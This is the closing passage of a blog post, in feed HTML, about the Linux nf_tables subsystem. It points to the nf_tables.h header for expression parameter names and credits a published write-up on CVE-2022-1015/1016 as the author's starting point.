<p>In <a href="https://git.netfilter.org/libnftnl/tree/include/linux/netfilter/nf_tables.h">include/linux/netfilter/nf_tables.h</a> in the repository you can find all of the parameter names (and enum values) for all of the expressions. This file is a copy of <code class="language-plaintext highlighter-rouge">include/uapi/linux/netfilter/nf_tables.h</code> from the kernel tree.</p>

<h2 id="closing-remarks-">Closing remarks <a name="closing"></a></h2>
<p>Ultimately I hope this article can provide you with a solid understanding of nf_tables. I hope I saved some people precious hours that they would otherwise pour into researching nf_tables.</p>

<p>Credit to <a href="https://twitter.com/pqlqpql">David Bouman</a> for his <a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/">write up</a> that gave me the base knowledge that I needed to take a deeper look and ultimately write this article.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Introduction Hello there!]]></summary></entry></feed>